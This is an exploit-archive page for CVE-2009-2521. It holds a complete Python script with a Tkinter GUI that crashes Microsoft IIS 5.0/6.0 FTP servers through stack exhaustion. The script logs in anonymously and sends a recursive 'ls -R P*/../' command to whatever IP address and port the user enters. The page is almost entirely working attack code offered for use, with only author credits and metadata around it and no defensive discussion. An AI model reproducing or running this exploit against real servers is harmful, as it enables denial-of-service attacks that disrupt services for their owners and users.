Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service



EKU-ID: 2686 CVE: 2009-2521 OSVDB-ID:
Author: D35m0nd142 Published: 2012-10-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
# Exploit Title: Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service [GUI VERSION]
# Exploit Author: D35m0nd142 
# Date: 03/10/2012
# Vendor Homepage: http://www.iis.net/
# Tested on Ubuntu 12.04
# CVE: 2009-2521
# Special thanks to Kingcope 

from socket import *
import sys
import Tkinter 
import time

def exploit():
	sock=socket(AF_INET,SOCK_STREAM)
	ip1=ip.get()
	port1=port.get()
	username="ftp"
	passwd="[email protected]"
	sock.connect((ip1,port1))
	sock.send("user %s\r\n" %username)
	print "[+]" + sock.recv(1024)
	sock.send("pass %s\r\n" %passwd)
	print "[+]" + sock.recv(1024)
	command="ls -R P*/../"
	sock.send("%s\r\n" %command)
	print sock.recv(1024)
	sock.close()
	time.sleep(2)
	exploited=Tkinter.Label(text="[+] Exploit sent [+]",bg="blue",fg="green").pack()		

root=Tkinter.Tk()
root.title("* Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service *")
root['bg']="black"
ip_text=Tkinter.Label(text="IP Address :").pack()
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
port_text=Tkinter.Label(text="Port :").pack()
port=Tkinter.IntVar()
port_entry=Tkinter.Entry(textvariable=port).pack()
exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
author=Tkinter.Label(text="Author: D35m0nd142 | https://twitter.com/D35m0nd142").pack(side='bottom')
root.mainloop()